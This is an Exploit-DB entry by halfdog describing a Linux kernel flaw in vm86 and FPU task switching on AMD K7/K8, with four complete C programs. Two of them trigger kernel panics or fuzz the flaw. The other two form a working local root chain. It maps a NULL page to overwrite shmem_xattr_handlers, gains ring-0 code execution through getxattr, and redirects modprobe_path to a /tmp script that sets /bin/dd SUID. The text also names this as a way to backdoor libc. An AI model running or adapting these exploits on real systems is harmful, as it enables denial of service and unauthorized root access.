Vm86 - Syscall Task Switch Kernel Panic (Denial of Service) / Privilege Escalation

EDB-ID:

41766

CVE:

N/A

Author:

halfdog

Type:

local

Platform:

Linux

Published:

2012-10-19

Source: http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/

## Introduction

Problem description: The initial observation was, that the linux vm86 syscall, which allows to use the virtual-8086 mode from userspace for emulating of old 8086 software as done with dosemu, was prone to trigger FPU errors. Closer analysis showed, that in general, the handling of the FPU control register and unhandled FPU-exception could trigger CPU-exceptions at unexpected locations, also in ring-0 code. Key player is the emms instruction, which will fault when e.g. cr0 has bits set due to unhandled errors. This only affects kernels on some processor architectures, currently only AMD K7/K8 seems to be relevant.

## Methods

Virtual86SwitchToEmmsFault.c (http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/Virtual86SwitchToEmmsFault.c) was the first POC, that triggers kernel-panic via vm86 syscall. Depending on task layout and kernel scheduler timing, the program might just cause an OOPS without heavy side-effects on the system. OOPS might happen up to 1min after invocation, depending on the scheduler operation and which of the other tasks are using the FPU. Sometimes it causes recursive page faults, thus locking up the entire machine.

To allow reproducible tests on at least a local machine, the random code execution test tool (Virtual86RandomCode.c - http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/Virtual86RandomCode.c) might be useful. It still uses the vm86-syscall, but executes random code, thus causing the FPU and task schedule to trigger a multitude of faults and to faster lock-up the system. When executed via network, executed random data can be recorded and replayed even when target machine locks up completely. Network test:

socat TCP4-LISTEN:1234,reuseaddr=1,fork=1 EXEC:./Virtual86RandomCode,nofork=1

tee TestInput < /dev/urandom | socat - TCP4:x.x.x.x:1234 > ProcessedBlocks

An improved version allows to bring the FPU into the same state without using the vm86-syscall. The key instruction is fldcw (floating point unit load control word). When enabling exceptions in one process just before exit, the task switch of two other processes later on might fail. It seems that due to that failure, the task->nsproxy ends up being NULL, thus causing NULL-pointer dereference in exit_shm during do_exit.
When the NULL-page is mapped, the NULL-dereference could be used to fake a rw-semaphore data structure. In exit_shm, the kernel attemts to down_write the semaphore, which adds the value 0xffff0001 at a user-controllable location. Since the NULL-dereference does not allow arbitrary reads, the task memory layout is unknown, thus standard change of EUID of running task is not possible. Apart from that, we are in do_exit, so we would have to change another task. A suitable target is the shmem_xattr_handlers list, which is at an address known from System.map. Usually it contains two valid handlers and a NULL value to terminate the list. As we are lucky, the value after NULL is 1, thus adding 0xffff0001 to the position of the NULL-value plus 2 will will turn the NULL into 0x10000 (the first address above mmap_min_addr) and the following 1 value into NULL, thus terminating the handler list correctly again.
The code to perform those steps can be found in FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c (http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c)

The modification of the shmem_xattr_handlers list is completely silent (could be a nice data-only backdoor) until someone performs a getxattr call on a mounted tempfs. Since such a file-system is mounted by default at /run/shm, another program can turn this into arbitrary ring-0 code execution. To avoid searching the process list to give EUID=0, an alternative approach was tested. When invoking the xattr-handlers, a single integer value write to another static address known from System.map (modprobe_path) will change the default modprobe userspace helper pathname from /sbin/modprobe to /tmp//modprobe. When unknown executable formats or network protocols are requested, the program /tmp//modprobe is executed as root, this demo just adds a script to turn /bin/dd into a SUID-binary. dd could then be used to modify libc to plant another backdoor there. The code to perform those steps can be found in ManipulatedXattrHandlerForPrivEscalation.c (http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ManipulatedXattrHandlerForPrivEscalation.c).




--- Virtual86SwitchToEmmsFault.c ---
/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2013 halfdog <me (%) halfdog.net>
 *
 *  This progam maps memory pages to the low range above 64k to
 *  avoid conflicts with /proc/sys/vm/mmap_min_addr and then
 *  triggers the virtual-86 mode. Due to unhandled FPU errors,
 *  task switch will fail afterwards, kernel will attempt to
 *  kill other tasks when switching.
 *
 *  gcc -o Virtual86SwitchToEmmsFault Virtual86SwitchToEmmsFault.c
 *
 *  See http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ for more information.
 */

#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/vm86.h>
#include <unistd.h>


static const char *DEDICATION="To the most adorable person met so far.";


static void handleSignal(int value, siginfo_t *sigInfo, void *context) {
  fprintf(stderr, "Handling signal\n");
}


void runTest(void *realMem) {
  struct vm86plus_struct vm86struct;
  int		result;

  memset(&vm86struct, 0, sizeof(vm86struct));
  vm86struct.regs.eip=0x0;
  vm86struct.regs.cs=0x1000;
// IF_MASK|IOPL_MASK
  vm86struct.regs.eflags=0x3002;

  vm86struct.regs.esp=0x400;
  vm86struct.regs.ss=0x1000;
  vm86struct.regs.ebp=vm86struct.regs.esp;
  vm86struct.regs.ds=0x1000;
  vm86struct.regs.fs=0x1000;
  vm86struct.regs.gs=0x1000;
  vm86struct.flags=0x0L;
  vm86struct.screen_bitmap=0x0L;
  vm86struct.cpu_type=0x0L;
 
  alarm(1);
  
  result=vm86(VM86_ENTER, &vm86struct);
  if(result) {
    fprintf(stderr, "vm86 failed, error %d (%s)\n", errno,
        strerror(errno));
  }
}


int main(int argc, char **argv) {
  struct sigaction sigAction;

  int		realMemSize=1<<20;
  void		*realMem;
  int		result;

  sigAction.sa_sigaction=handleSignal;
  sigfillset(&sigAction.sa_mask);
  sigAction.sa_flags=SA_SIGINFO;
  sigAction.sa_restorer=NULL;
  sigaction(SIGILL, &sigAction, NULL); // 4
  sigaction(SIGFPE, &sigAction, NULL); // 8
  sigaction(SIGSEGV, &sigAction, NULL); // 11
  sigaction(SIGALRM, &sigAction, NULL); // 14

  realMem=mmap((void*)0x10000, realMemSize, PROT_EXEC|PROT_READ|PROT_WRITE,
      MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
  if(realMem==(void*)-1) {
    fprintf(stderr, "Failed to map real-mode memory space\n");
    return(1);
  }

  memset(realMem, 0, realMemSize);
  memcpy(realMem, "\xda\x44\x00\xd9\x2f\xae", 6);

  runTest(realMem);
}
--- EOF ---

--- Virtual86RandomCode.c ---
/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2013 halfdog <me (%) halfdog.net>
 *
 *  This progam maps memory pages to the low range above 64k to
 *  avoid conflicts with /proc/sys/vm/mmap_min_addr and then
 *  triggers the virtual-86 mode.
 *
 *  gcc -o Virtual86RandomCode Virtual86RandomCode.c
 *
 *  Usage: ./Virtual86RandomCode < /dev/urandom > /dev/null
 *
 *  See http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ for more information.
 */

#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/vm86.h>
#include <unistd.h>


static const char *DEDICATION="To the most adorable person met so far.";


static void handleSignal(int value, siginfo_t *sigInfo, void *context) {
  fprintf(stderr, "Handling signal\n");
}


int readFully(int inputFd, void *data, int length) {
  int readLength=0;
  int result;

  while(length) {
    result=read(inputFd, data, length);
    if(result<0) {
      if(!readLength) readLength=result;
      break;
    }
    readLength+=result;
    length-=result;
    data+=result;
  }
  return(readLength);
}


void runTest(void *realMem) {
  struct vm86plus_struct	vm86struct;
  int		result;


  memset(&vm86struct, 0, sizeof(vm86struct));
  vm86struct.regs.eip=0x0;
  vm86struct.regs.cs=0x1000;
// IF_MASK|IOPL_MASK
  vm86struct.regs.eflags=0x3002;

// Do not use stack above 
  vm86struct.regs.esp=0x400;
  vm86struct.regs.ss=0x1000;
  vm86struct.regs.ebp=vm86struct.regs.esp;
  vm86struct.regs.ds=0x1000;
  vm86struct.regs.fs=0x1000;
  vm86struct.regs.gs=0x1000;
  vm86struct.flags=0x0L;
  vm86struct.screen_bitmap=0x0L;
  vm86struct.cpu_type=0x0L;
 
  alarm(1);
  
  result=vm86(VM86_ENTER, &vm86struct);
  if(result) {
    fprintf(stderr, "vm86 failed, error %d (%s)\n", errno,
        strerror(errno));
  }
}


int main(int argc, char **argv) {
  struct sigaction sigAction;

  int		realMemSize=1<<20;
  void		*realMem;
  int		randomFd=0;
  int		result;

  sigAction.sa_sigaction=handleSignal;
  sigfillset(&sigAction.sa_mask);
  sigAction.sa_flags=SA_SIGINFO;
  sigAction.sa_restorer=NULL;
  sigaction(SIGILL, &sigAction, NULL); // 4
  sigaction(SIGFPE, &sigAction, NULL); // 8
  sigaction(SIGSEGV, &sigAction, NULL); // 11
  sigaction(SIGALRM, &sigAction, NULL); // 14

  realMem=mmap((void*)0x10000, realMemSize, PROT_EXEC|PROT_READ|PROT_WRITE,
      MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
  if(realMem==(void*)-1) {
    fprintf(stderr, "Failed to map real-mode memory space\n");
    return(1);
  }

  result=readFully(randomFd, realMem, realMemSize);
  if(result!=realMemSize) {
    fprintf(stderr, "Failed to read random data\n");
    return(0);
  }

  write(1, &result, 4);
  write(1, realMem, realMemSize);
  while(1) {
    runTest(realMem);

    result=readFully(randomFd, realMem, 0x1000);
    write(1, &result, 4);
    write(1, realMem, result);
  }
}
--- EOF ---

--- FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c ---
/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2014 halfdog <me (%) halfdog.net>
 *
 *  This progam maps a NULL page to exploit a kernel NULL-dereferences,
 *  Usually that will not work due to sane /proc/sys/vm/mmap_min_addr
 *  settings. An unhandled FPU error causes part of task switching
 *  to fail resulting in NULL-pointer dereference. This can be
 *  used to add 0xffff0001 to an arbitrary memory location, one
 *  of the entries in shmem_xattr_handlers is quite suited because
 *  it has a static address, which can be found in System.map.
 *  Another tool (ManipulatedXattrHandlerForPrivEscalation.c)
 *  could then be used to invoke the xattr handlers, thus giving
 *  local root privilege escalation.
 *
 *  gcc -o FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c
 *
 *  See http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ for more information.
 */

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <unistd.h>


static const char *DEDICATION="To the most adorable person met so far.";



int main(int argc, char **argv) {
  int		childPid;
  int		sockFds[2];
  int		localSocketFd;
  int		requestCount;
  int		result;


// Cleanup beforehand to avoid interference from previous run
  asm volatile (
    "emms;"
    : // output (0)
    :
    :
  );

  childPid=fork();
  if(childPid>0) {
    mmap((void*)0, 1<<12, PROT_EXEC|PROT_READ|PROT_WRITE,
         MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

// down_write just adds 0xffff0001 at location offset +0x6c of
// the memory address given below. shmem_xattr_handlers handlers are
// at 0xc150ae1c and contain two valid handlers, terminated by
// a NULL value. As we are lucky, the value after NULL is 1, thus
// adding 0xffff0001 shmem_xattr_handlers + 0x6c + 0xa will turn
// the NULL into 0x10000 and the following 1 into NULL, hence
// the handler list is terminated correctly again.
    *((int*)0x8)=0xc150adba;

    result=socketpair(AF_UNIX, SOCK_STREAM, 0, sockFds);

    result=fork();
    close(sockFds[result?1:0]);
    localSocketFd=sockFds[result?0:1];
    asm volatile (
      "emms;"
      : // output (0)
      :
      :
    );

    fprintf(stderr, "Playing task switch ping-pong ...\n");
// This might be too short on faster CPUs?
    for(requestCount=0x10000; requestCount; requestCount--) {
      result=write(localSocketFd, sockFds, 4);
      if(result!=4) break;
      result=read(localSocketFd, sockFds, 4);
      if(result!=4) break;
      asm volatile (
        "fldz;"
        "fldz;"
        "fdivp;"
        : // output (0)
        :
        :
      );
    }
    close(localSocketFd);
    fprintf(stderr, "Switch loop terminated\n");

// Cleanup afterwards
    asm volatile (
      "emms;"
      : // output (0)
      :
      :
    );

    return(0);
  }

  usleep(10000);

// Enable FPU exceptions
  asm volatile (
    "fdivp;"
    "fstcw %0;"
    "andl $0xffc0, %0;"
    "fldcw %0;"
    : "=m"(result) // output (0)
    :
    :"%eax" // Clobbered register
  );

// Terminate immediately, this seems to improve results
  return(0);
}
--- EOF ---

--- ManipulatedXattrHandlerForPrivEscalation.c ---
/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2014 halfdog <me (%) halfdog.net>
 *
 *  This progam prepares memory so that the manipulated shmem_xattr_handlers
 *  (see FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c)
 *  will be read from here, thus giving ring-0 code execution.
 *  To avoid fiddling with task structures, this will overwrite
 *  just 4 bytes of modprobe_path, which is used by the kernel
 *  when unknown binary formats or network protocols are requested.
 *  In the end, when executing an unknown binary format, the modified
 *  modprobe script will just turn "/bin/dd" to be SUID, e.g. to
 *  own libc later on.
 *
 *  gcc -o ManipulatedXattrHandlerForPrivEscalation ManipulatedXattrHandlerForPrivEscalation.c
 *
 *  See http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ for more information.
 */

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>


static const char *DEDICATION="To the most adorable person met so far.";


int main(int argc, char **argv) {
  void *handlerPage;
  int	*handlerStruct;
  void	*handlerCode;
  char	*modprobeCommands="#!/bin/sh\nchmod u+s /bin/dd\n";

  int	result;

  handlerStruct=(int*)0x10000;
  handlerPage=mmap((void*)(((int)handlerStruct)&0xfffff000), 1<<12,
      PROT_EXEC|PROT_READ|PROT_WRITE,
      MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  if(handlerPage==(void*)-1) {
    fprintf(stderr, "Failed to map handler page\n");
    return(1);
  }
  fprintf(stderr, "Handler page at %p\n", handlerPage);

  *handlerStruct=(int)(handlerStruct+0x10); // Prefix pointer
  strcpy((char*)(handlerStruct+0x10), "system"); // Prefix value

  handlerCode=(void*)(handlerStruct+0x100);
  *(handlerStruct+0x2)=(int)handlerCode; // list
  *(handlerStruct+0x3)=(int)handlerCode; // get
  *(handlerStruct+0x4)=(int)handlerCode; // set

// Switch the modprobe helper path from /sbin to /tmp. Address is
// known from kernel version's symbols file
  memcpy(handlerCode, "\xb8\xa1\x2d\x50\xc1\xc7\x00tmp/\xc3", 12);

  result=getxattr("/run/shm/", "system.dont-care", handlerPage, 1);
  fprintf(stderr, "Setattr result: 0x%x, error %d (%s)\n", result,
      errno, strerror(errno));

  result=open("/tmp/modprobe", O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);
  write(result, modprobeCommands, strlen(modprobeCommands));
  close(result);

// Create a pseudo-binary with just NULL bytes, executing it will
// trigger the binfmt module loading
  result=open("/tmp/dummy", O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);
  memset(handlerPage, 0, 1<<12);
  write(result, handlerPage, 1<<12);
  close(result);
  *(int*)handlerPage=(int)"/tmp/dummy";
  execve("/tmp/dummy", handlerPage, NULL);
  return(0);
}
--- EOF ---